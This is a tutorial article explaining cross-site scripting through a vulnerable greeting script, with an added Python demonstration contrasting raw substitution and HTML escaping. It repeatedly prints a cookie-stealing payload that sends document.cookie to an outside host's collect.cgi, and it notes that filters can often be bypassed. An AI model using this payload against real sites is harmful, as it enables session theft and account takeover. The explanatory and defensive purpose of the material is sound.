Cross-Site Scripting

What is it?

XSS (cross-site scripting) is a vulnerability in web sites that allows attackers to inject script code. XSS can be delivered as a single URL the victim needs to follow, or through a POST request (usually by having the victim visit an HTML page the attacker has crafted). One example of XSS being exploited is the MySpace Samy Worm.

POST and GET Requests

Web sites commonly use POST and GET to send and receive user data (these are HTTP request methods). When you hit the submit button on your shopping cart in an online store, you send a POST request. One way to see how this happens is to download and try Fiddler for Internet Explorer, or Tamper Data for Firefox. I would recommend you start learning with Tamper Data, though.

Request Example

Suppose my site had a script called hi.cgi which greeted you when you loaded it. The GET request for it would look like this:
GET /hi.cgi?name=Anubis HTTP/1.0
My server would generate the following HTML based on this script:
<html>
<head>:: LikeWize :: [Welcome Script]</head>
<body>Greetings, Anubis.</body>
</html>
If I were an attacker and wanted to steal cookies from you, I could find a way to make your browser send the following GET request:
GET /welcome.cgi?name=<script>window.open("http://www.likewize.net/collect.cgi?cookie=" + document.cookie)</script>
Don't try the link because there is no collect.cgi on my server, LOL. Anyway, the server would substitute the JavaScript above into the name in the HTML:
<html>
<head>:: LikeWize :: [Welcome Script]</head>
<body>Greetings, <script>window.open("http://www.likewize.net/collect.cgi?cookie=" + document.cookie)</script>.
</body>
</html>
Your browser will then end up sending your cookies to me. But this doesn't even scratch the surface. JavaScript can do a whole lot more than just send over a few cookies for me to eat: you can set up XSS to send an attacker the username and password fields of a login form, for example. XSS can also be introduced through user input of rich content, such as pictures or videos.
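The substitution above is the whole bug: the server drops the `name` parameter straight into HTML, so a name that contains markup becomes live markup. As an added example (not code from the article or from the author's server), here is a Python stand-in for hi.cgi that parses the GET request line, renders the page the vulnerable way, and then renders it the hardened way with HTML escaping, using the article's own cookie-stealing payload as constructed input.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# The article's example payload, used here as constructed test input.
PAYLOAD = ('<script>window.open("http://www.likewize.net/collect.cgi?cookie="'
           ' + document.cookie)</script>')

# A browser percent-encodes the query string, so build the request line the
# way it would actually arrive on the wire (constructed, not a real capture).
REQUEST_LINE = f"GET /hi.cgi?name={quote(PAYLOAD, safe='')} HTTP/1.0"

# Page layout modelled on the article's welcome script output.
TEMPLATE = (
    "<html>\n"
    "<head><title>:: LikeWize :: [Welcome Script]</title></head>\n"
    "<body>Greetings, {name}.</body>\n"
    "</html>"
)


def name_from_request(request_line: str) -> str:
    """Pull the URL-decoded `name` parameter out of an HTTP GET request line."""
    _method, rest = request_line.split(" ", 1)
    target, _version = rest.rsplit(" ", 1)
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return params.get("name", [""])[0]


def render_vulnerable(name: str) -> str:
    """What the article's script does: raw substitution into an HTML text context."""
    return TEMPLATE.format(name=name)


def render_hardened(name: str) -> str:
    """The fix for this context: escape <, >, &, and quotes before substitution,
    so the user's text is displayed as text and never parsed as markup."""
    return TEMPLATE.format(name=html.escape(name, quote=True))


def contains_script_tag(page: str) -> bool:
    """Crude check: did a live <script> element survive into the response?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    name = name_from_request(REQUEST_LINE)
    print("vulnerable output has <script>:", contains_script_tag(render_vulnerable(name)))
    print("hardened output has <script>:  ", contains_script_tag(render_hardened(name)))
    print(render_hardened(name))
```

Escaping is context-specific: html.escape is right for text between tags and inside quoted attributes, but output landing inside a `<script>` block or a URL needs that context's own encoding.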

Summary

You first need to find an XSS vulnerability before you can exploit it. Some sites will try to filter the special characters you need for JavaScript, but more often than not, there are ways around this.

Thank you for reading this article. If you have any suggestions or need clarification please do not hesitate to start a thread on my forum or to send me an e-mail. There is no such thing as a stupid question, but there is such a thing as a stupid fear of asking.